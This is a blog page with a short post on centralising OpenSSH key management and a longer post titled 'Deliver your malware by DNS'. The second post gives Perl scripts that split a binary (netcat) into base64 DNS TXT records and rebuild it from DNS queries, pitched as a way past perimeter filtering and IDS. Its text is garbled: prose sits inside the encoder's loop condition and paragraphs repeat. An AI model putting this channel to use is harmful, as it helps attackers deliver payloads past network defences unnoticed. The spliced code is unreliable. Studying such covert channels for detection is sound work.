I love OpenSSH. It's a wonderfully versatile way of securing logins and data in transit between systems. One bugbear of mine is how difficult it becomes to manage authentication keys. I've posted about this in the long distant past (the Internet has a long memory) and the subject just won't die, at least not in my mind. So why does this still bug me?
In truth little has changed over the years in the way SSH keys are handled. Keys are managed in userland, with each user being able to add keys that are trusted for authentication their account. This is all well and good until the web of trust between host accounts, keys and key owners becomes unmanageable. Who owns or possesses each of the keys in the authorized_keys files, for every user on every host? Are the private keys well protected?
One solution might be to centralise SSH key management and move key management to a more strictly controlled environment. I imagine it working something like traditional Unix account management; a file where, unlike the Unix shadow file, more than one authentication token can be linked to an account. This file is owned by root and special tools (like passwd) must be used so less privileged users can update and maintain the list of keys linked to their user account. This would allow for management and auditing of SSH keys from a single location.
There are other benefits to be gained from this type of key management. Rules could be added to enforce storage of additional metadata along with the key such as who owns it an expiry date to limit the lifetime of a key. Maybe I should dust off my C++ textbooks and take a look at the OpenSSH source...
Monday, 26 July 2010
Tuesday, 8 June 2010
Deliver your malware by DNS
HTTP is probably the most common way for distributing malware and for downloading tools onto compromised systems. Too many people are still allowing unfettered access from their server farm to port 80, but perhaps things are getting better. In the hope that one day servers won't be able to wget the latest rootkit once they're owned what other ways are their to deliver a payload?
The domain name system allows for TXT records that can contain a text string. Once intended to hold human-readable information about a host it can and has been used to store other information such as SPF and DKIM records. Since we can feed arbitrary text data into a TXT record we could use this to store binaries data encoded as text using base64 or uuencode for example. I thought I would give this a go an wrote a little perl script to encode a file into DNS entries.
This script recovers the encoded file using DNS queries.
If we start making it harder to deliver malware by HTTP the bay guys will up their game. It's easy to see that they don't need to up much to defeat the perimeter controls of most organisations by abusing a service core to the way the Internet works.
The domain name system allows for TXT records that can contain a text string. Once intended to hold human-readable information about a host it can and has been used to store other information such as SPF and DKIM records. Since we can feed arbitrary text data into a TXT record we could use this to store binaries data encoded as text using base64 or uuencode for example. I thought I would give this a go an wrote a little perl script to encode a file into DNS entries.
#!/usr/bin/perl use MIME::Base64; use Digest::MD5 qw(md5_hex); # Get content source $file = "nc.exe"; $name = "nc"; $prefix = "part"; $domain = ".example.net."; open IN, "<$file" || die "Cannot open $file: $?\n"; while (What you get out from this script is a list BIND zone file style DNS records. I encoded the old favourite netcat and the first few lines of output are shown below.) { $string .= $_; } close IN; $md5 = md5_hex($string); @parts = split("\n",encode_base64($string)); $numparts = $#parts + 1; $output = "${name}${domain} IN TXT \"md5=$md5; prefix=${prefix}; parts=$numparts;\"\n"; for ($i = 0; $i <= $#parts; $i++) { $output .= "${prefix}${i}${domain} IN TXT \"$parts[$i]\"\n"; } print $output;
nc IN TXT "md5=28dd8edad7008289957031606f210675; prefix=part; parts=459;" part0 IN TXT "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" part1 IN TXT "AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v" part2 IN TXT "ZGUuDQ0KJAAAAAAAAABQRQAATAEFAKlLOT8AAAAAAAAAAOAADwILAQI4AFQAAABiAAAAAgAAABAA" part3 IN TXT "AAAQAAAAcAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAACwAAAABAAAVLEAAAMAAAAAACAA"The first record is a contains the metadata relating to the encoded file. It consists of the MD5 checksum of the original file, a prefix for the TXT records containing the data and the number of records the payload is split across. Add a number starting from zero to the prefix, request, increment and repeat.
This script recovers the encoded file using DNS queries.
#!/usr/bin/perl use MIME::Base64; use Digest::MD5 qw(md5_hex); use Net::DNS::RR; $file = "nc"; $domain = "example.net"; $res = Net::DNS::Resolver->new( nameservers => [qw(127.0.0.1)] ); my $answer = $res->query("$file.$domain", 'TXT'); @txt=$answer->answer; ($initial) = $txt[0]->char_str_list(); # extract content checksum, prefix and number of parts $initial =~ /md5=(.*?);.*prefix=(.*?);.*parts=(.*?);/; $md5 = $1; $prefix = $2; $parts = $3; for ($i = 0; $i < $parts; $i++) { my $frag = $prefix . $i . "." . $domain; my $answer = $res->query("$frag", 'TXT'); my @frags =$answer->answer; my ($string) = $frags[0]->char_str_list(); $payload .= $string; } $binary = decode_base64($payload); if (md5_hex($binary) == $md5) { print STDERR "md5sum matches\n"; } open OUT, ">testfile"; print OUT $binary; close OUT;It looks like a lot more work than dropping a file on an FTP server, and to tell the truth it is, so why bother. I can think of a few reasons. Who bothers to filter DNS requests? Who bothers to check DNS responses for malicious payloads? What IDS system is going to detect an encoded file split over hundreds or thousands of DNS requests?
If we start making it harder to deliver malware by HTTP the bay guys will up their game. It's easy to see that they don't need to up much to defeat the perimeter controls of most organisations by abusing a service core to the way the Internet works.
Subscribe to:
Posts (Atom)